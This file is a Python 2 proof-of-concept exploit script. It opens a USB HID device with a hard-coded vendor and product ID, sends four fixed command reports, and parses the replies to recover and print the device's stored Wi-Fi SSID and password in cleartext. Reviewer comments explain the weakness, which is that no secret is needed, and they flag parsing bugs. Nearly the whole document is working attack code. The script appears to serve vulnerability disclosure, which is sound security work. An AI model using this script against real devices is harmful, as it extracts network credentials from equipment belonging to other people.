exploit_usb.py
import hid
import time
import numpy as np
import array
# Proof-of-concept written for Python 2: str.decode("hex"), the print
# statement and "except IOError, ex" below do not exist in Python 3.
#
# The script opens the USB HID device 0x25da:0x0001, writes four fixed reports
# to it, and parses two of the reports it reads back as an SSID and a password,
# which it then prints.
#
# Security-relevant point: the bytes are turned into text with nothing more
# than chr(), and the four reports are constants -- the operator supplies no
# secret. As far as this script shows, any host that can talk to the device
# over USB receives the stored credentials in the clear. The script's output
# is therefore itself a secret and should not end up in logs or tickets.
#
# NOTE(review): this listing had lost its indentation; the nesting below is the
# most plausible reconstruction and should be confirmed against the original
# file before relying on it.

# Four fixed reports, kept as hex text and converted to unsigned-byte arrays
# for h.write(). Their field layout is not documented anywhere in this file.
# presumably each one is 58 bytes, matching the 58-byte reads below -- confirm
c1_string = "010055060002000AFF38B70000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
hex_c1 = c1_string.decode("hex")
c1 = array.array('B', hex_c1)
c2_string = "01005507003F0000000101B800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
hex_c2 = c2_string.decode("hex")
c2 = array.array('B', hex_c2)
ca_string = "01005506000200140042A20000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
hex_ca = ca_string.decode("hex")
ca = array.array('B', hex_ca)
cb_string = "0100550C0043000B00012000020000077C0000000000000000000000000000000000000000000000000000000000000000000000000000000000"
hex_cb = cb_string.decode("hex")
cb = array.array('B', hex_cb)
try:
    print "Opening device"
    # Vendor and product id are hard-coded; see the except branch below.
    h = hid.device(0x25da, 0x0001)
    print "Manufacturer: %s" % h.get_manufacturer_string()
    print "Product: %s" % h.get_product_string()
    print "Serial No: %s" % h.get_serial_number_string()
    # Two reports are read and thrown away before anything is written.
    # presumably this drains pending input -- confirm
    for k in range(2):
        d = h.read(58)
        time.sleep(0.05)
    # First pair of fixed reports.
    h.write(c1)
    h.write(c2)
    # One reply is read and discarded.
    for k in range(1):
        d = h.read(58)
        time.sleep(0.05)
    # Second pair of fixed reports; the replies parsed below follow these.
    h.write(ca)
    h.write(cb)
    # Another reply is read and discarded.
    d = h.read(58)
    time.sleep(0.05)
    # Byte values collected from the replies, joined into text at the end.
    ssid = []
    password = []
    # This reply carries the SSID, and after it the start of the password.
    d = h.read(58)
    if d:
        # Only changes how numpy prints integers; no array is printed in this
        # script, so the call has no visible effect here.
        np.set_printoptions(formatter={'int': lambda x: hex(int(x))})
        a = np.array(d)
        # The SSID is taken from index 14 up to the first zero byte.
        # NOTE(review): a[offset] raises IndexError if the report is shorter
        # than expected, and only IOError is caught below.
        offset = 14
        while (a[offset] != 0) and (offset < 57):
            ssid.append(a[offset])
            offset = offset + 1
        # Skip the zero bytes that separate the two fields.
        while (a[offset] == 0) and (offset < 57):
            offset = offset + 1
        # Both loops above stop at 57 at the latest, so this test is always
        # true.
        if offset < 58:
            # NOTE(review): this byte is appended again by the first pass of
            # the loop below, because offset has not advanced -- confirm that
            # is intended.
            password.append(a[offset])
            while (a[offset] != 0) and (offset < 57):
                password.append(a[offset])
                offset = offset + 1
            # Appends the byte the loop stopped on: index 57 when the field
            # runs to the end of the report, otherwise the zero terminator.
            password.append(a[offset])
    time.sleep(0.05)
    # This reply carries the rest of the password, starting at index 2.
    d = h.read(58)
    if d:
        np.set_printoptions(formatter={'int': lambda x: hex(int(x))})
        a = np.array(d)
        offset = 2
        while (a[offset] != 0) and (offset < 57):
            password.append(a[offset])
            offset = offset + 1
    time.sleep(0.05)
    # The recovered credentials go to stdout in cleartext.
    print "*" * 30
    print "ssid: " + ''.join(chr(i) for i in ssid)
    print "password: " + ''.join(chr(i) for i in password)
    print "*" * 30
    # One more reply is read and discarded before the handle is closed.
    d = h.read(58)
    time.sleep(0.05)
    print "Closing device"
    # NOTE(review): reached only on the success path; any exception above
    # skips the close, since there is no finally clause.
    h.close()
except IOError, ex:
    # Only IOError is handled here. The messages below treat it as "device not
    # present", although the same handler would also report any other IOError
    # raised inside the try block.
    print ex
    print "You probably don't have the hard coded test hid."
    print "Update the hid.device and try again."
print "Done"